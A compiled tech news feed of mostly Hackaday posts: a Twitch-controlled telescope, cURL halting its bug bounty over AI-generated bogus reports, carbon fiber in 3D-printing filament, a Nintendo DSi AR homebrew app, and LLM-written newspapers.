— Even some of the United States' closest allies are re-evaluating their ties to American tech amid growing concerns about Washington's worldview.

— It's official. ByteDance sold off its US TikTok unit. But does the fire sale actually solve the underlying national security and privacy concerns?

— Many teenagers are OK with a smartphone ban at school. They are less keen on their devices being taken away forever.

Let's get started:

digitalpolitics.co/newsletter0…

Although there are a few hobbies that have low-cost entry points, amateur astronomy is not generally among them. A tabletop Dobsonian might cost a few hundred dollars, and that is just the entry point for an ever-increasing set of telescopes, mounts, trackers, lasers, and other pieces of equipment that it’s possible to build or buy. [Thomas] is deep into astronomy now, has a high-quality, remotely controllable telescope, and wanted to make it more accessible to his friends and others, so he built a system that lets the telescope stream on Twitch and lets his Twitch viewers control what it’s looking at.

The project began with overcoming the $4000 telescope’s practical limitations, most notably an annoyingly short Wi-Fi range and closed software. [Thomas] built a wireless bridge with a Raspberry Pi to extend connectivity, and then built a headless streaming system using OBS Studio inside a Proxmox container. This was a major hurdle as OBS doesn’t have particularly good support for headless operation.

The next step was reverse engineering the proprietary software the telescope uses for control. [Thomas] was able to probe network traffic on the Android app and uncovered undocumented REST and WebSocket APIs. From there, he gained full control over targeting, parking, initialization, and image capture. This allowed him to automate telescope behavior through Python scripts rather than relying on the official Android app.

To make the telescope interactive, he built a Twitch-integrated control system that enables viewers to vote on celestial targets, issue commands, and view live telemetry, including stacking progress, exposure data, and target coordinates. A custom HTML/CSS/JavaScript overlay displays real-time status, and there’s a custom loading screen when the telescope is moving to a new target. He also added ambient music and atmospheric effects, so the stream isn’t silent.

If [Thomas]’s stream is your first entry point into astronomy and you find that you need to explore it more on your own, there are plenty of paths to build your way into the hobby, especially with Dobsonian telescopes, which can be built by hand, including the mirrors.

hackaday.com/2026/01/26/astron…

Over the past years, the author of the cURL project, [Daniel Stenberg], has repeatedly complained about the increasingly poor quality of bug reports filed due to LLM chatbot-induced confabulations, also known as ‘AI slop’. This has now led the project to suspend its bug bounty program starting February 1, 2026.

Examples of such slop are provided by [Daniel] in a GitHub gist, which covers a wide range of very intimidating-looking vulnerabilities and seemingly clear exploits. Except that none of them are vulnerabilities when actually examined by a knowledgeable developer. Each is a lengthy word salad that an LLM churned out in seconds, yet which takes a human significantly longer to parse before dealing with the typical diatribe from the submitter.

Although there are undoubtedly still valid reports coming in, the truth of the matter is that the ease with which bogus reports can be generated by anyone who has access to an LLM chatbot and some spare time has completely flooded the bug bounty system and is overwhelming the very human developers who have to dig through the proverbial midden to find that one diamond ring.

We have mentioned before how troubled bounty programs are for open source, and how projects like Mesa have already had to fight off AI slop incidents from people with zero understanding of software development.

hackaday.com/2026/01/26/the-cu…

Carbon fiber (CF) has attained somewhat of a near-mystical appeal in consumer marketing, with it being praised for being stronger than steel while simultaneously being extremely lightweight. This mostly refers to weaved fibers combined with resin into a composite material that is used for everything from car bodies to bike frames. This CF look is so sexy that the typical carbon-fiber composite weave pattern and coloring have been added to products as a purely cosmetic accent.

More recently, chopped carbon fiber (CCF) has been added to the thermoplastics we extrude from our 3D printers. Despite lacking clear evidence of this providing material improvements, the same kind of mysticism persists here as well. Even as evidence emerges of poor integration of these chopped fibers into the thermoplastic matrix, the marketing claims continue unabated.

As with most things, there’s a right way and a wrong way to do it. A recent paper by Sameh Dabees et al. in Composites for example covered the CF surface modifications required for thermoplastic integration with CF.

Carbon Fibers

There are a number of ways to produce CF, often using polyacrylonitrile, rayon, or pitch as the feedstock. After spinning this precursor into a suitable filament, heating induces carbonization and produces the carbon fiber.
Schematic representation of carbon fiber preparation from polyacrylonitrile.A 6 μm diameter carbon filament, compared to 50 μm diameter human hair. (Source: Wikimedia)
Following this process, the CF is typically in the form of a few micrometer-thick fiber that is essentially pure carbon. To create a structural interface between the CF and the polymer of a composite material, some kind of process has to take place that creates this interface.

The fundamental difference between thermoset and thermoplastic polymers is that thermoset polymers are reacting in the mold as it sets, providing an environment in which the epoxy precursor and hardener can interact with the normally not chemically very reactive CF to form covalent bonds.

In comparison, thermoplastic polymers are already finalized, with covalent bonds between thermoplastics and CF unlikely. This means that the focus with CF-reinforced thermoplastics is mostly on weaker, non-covalent interactions, such as Van der Waals forces, pi-interactions and hydrogen bonds. Each of these interactions is further dependent on whether the thermoplastic is compatible, such as the presence of aromatic rings for pi-interactions.

Making It Stick

With those challenges in mind, how can thermoplastics be coaxed into forming a significant interface with CF? As noted in the earlier cited work by Sameh Dabees et al., there is no single surface treatment for CF that would work for every thermoplastic polymer, as a logical result of the limitations imposed by the available non-covalent interactions.
Carbon fiber in PLA after FDM printing, showing clear voids. (Credit: I built a thing, YouTube)
One way to prepare the CF is by applying a coating to the fiber, called a sizing. By applying a sizing to the fiber that is compatible with the target thermoplastic, the interface with the bulk material is expected to improve. In one cited study involving a polyamide-acid sizing for polyimide bulk material, this coating created an approximately 85 nm interface, with an interfacial shear strength increased by 32.3%. In another study targeting CF-PEEK, this had a polyimide-based, water-soluble sizing applied that also significantly improved the shear strength.

Of course, this sizing has to actually adhere to the CF, lest it simply vanishes into the bulk thermoplastic material. This is a problem that is easily observable in FDM-printed thermoplastic polymers as distinct voids around the CF where the bulk polymer pulled away during crystallization, and no interface formed. Obviously, these voids create a weak point instead of strengthening the material.

Fiber Modding

Although CF is often confused with carbon nanotubes, it does not have the rigidly ordered structure that they do. Instead it has a graphite structure, owing to the way that they are produced, meaning sheets of graphite placed together in a disordered fashion. Despite this, the external surface is still smooth, which is where the chemical inertness comes from. Combined with the lack of reactivity from the side of thermoplastics, this highlights the need for something to bridge the gap.
Various carbon fiber surface modification methods. (Credit: Dabees et al., 2025, Composites)
The review paper by Dabees et al. covers the most common types of surface treatments, with the above graphic providing a summary of the methods. Perhaps one of the most straightforward methods is the coating of the CF with an epoxy, thus shifting the interface from CF-thermoplastic to thermoset-thermoplastic. This kind of hybrid approach shows promising results, but is also cumbersome and not a universal fix.

Note that virtually all research here is focused on thermoplastic polymers like polycarbonate and PEEK, as these are most commonly used in industrial and medical settings. Yet even within that more limited scope the understanding of the exact effects of these modifications remains poorly investigated. Much of this is due to how hard it is to characterize the effects of one treatment when you take all other variables into account.

Perhaps most frustrating of all is how hard it is to research this topic considering the scale of the CF surface and the miniscule thickness of the CF-polymer interface. Relying on purely mechanical tests to quantify the impact is then tempting, but ultimately leaves us without a real understanding of why one method seems to work better than another.

Vibes Vs Science

The overall conclusion that we draw from this particular review paper is that although we know that composite materials can often provide improvements, in the case of thermoplastic-CF composites we realize that our understanding of the fundamentals is still rather lacking.

Outside of the less mainstream world of industrial and medical settings, CF is now widely being added to thermoplastic polymers, primarily in the form of filaments for FDM 3D printers. Without detailed information on whether the manufacturers of these filaments perform any kind of CF surface modification, it is very hard to even compare different CF-polymer filaments like this, even before taking into account individual FDM printer configurations and testing scenarios.

Considering that CF has for a few years now been identified as a potential carcinogen akin to asbestos, this raises the question of whether we really want to put CF and particularly the very small chopped carbon fibers into everything around us and thermoplastics in particular. When the empirical evidence available to us today shows that any mechanical improvements are not due to a solid CF-polymer interface, and any potential carcinogenic risks still years into the future of becoming clear, then the logical choice would be to hold back on CF-thermoplastics until we gain a better understanding of the benefits and risks.

hackaday.com/2026/01/26/does-c…

[Bhaskar Das] has been tinkering with one of Nintendo’s more obscure handhelds, the DSi. The old-school console has been given a new job as part of an augmented reality app called AetherShell.

The concept is straightforward enough. The Nintendo DSi runs a small homebrew app which lets you use the stylus to make simple line drawings on the lower touchscreen. These drawings are then trucked out wirelessly as raw touch data via UDP packets, and fed into a Gemini tool which transforms them into animation frames. These are then sent to an iPhone app, which uses ARKit APIs and the phone’s camera to display the animations embedded into the surrounding environment via augmented reality.

One might question the utility of this project, given that the iPhone itself has a touch screen you can draw on, too. It’s a fair question, and one without a real answer, beyond the fact that sometimes it’s really fun to play with an old console and do weird things with it. Plus, there just isn’t enough DSi homebrew out in the world. We love to see more.

youtube.com/embed/I389PbAJmVE?…

hackaday.com/2026/01/25/augmen…

If you’re reading this, you probably have some fondness for human-crafted language. After all, you’ve taken the time to navigate to Hackaday and read this, rather than ask your favoured LLM to trawl the web and summarize what it finds for you. Perhaps you have no such pro-biological bias, and you just don’t know how to set up the stochastic parrot feed. If that’s the case, buckle up, because [Rafael Ben-Ari] has an article on how you can replace us with a suite of LLM agents.
The AI-focused paper has a more serious aesthetic, but it’s still seriously retro.
He actually has two: a tech news feed, focused on the AI industry, and a retrocomputing paper based on SimCity 2000’s internal newspaper. Everything in both those papers is AI-generated; specifically, he’s using opencode to manage a whole dogpen of AI agents that serve as both reporters and editors, each in their own little sandbox.

Using opencode like this lets him vary the model by agent, potentially handing some tasks to small, locally-run models to save tokens for the more computationally-intensive tasks. It also allows each task to be assigned to a different model if so desired. With the right prompting, you could produce a niche publication with exactly the topics that interest you, and none of the ones that don’t. In theory, you could take this toolkit — the implementation of which [Rafael] has shared on GitHub — to replace your daily dose of Hackaday, but we really hope you don’t. We’d miss you.

That’s news covered, and we’ve already seen the weather reported by “AI”— now we just need an agenetic sports section and some AI-generated funny papers. That’d be the whole newspaper. If only you could trust it.

Story via reddit.

hackaday.com/2026/01/26/llm-ge…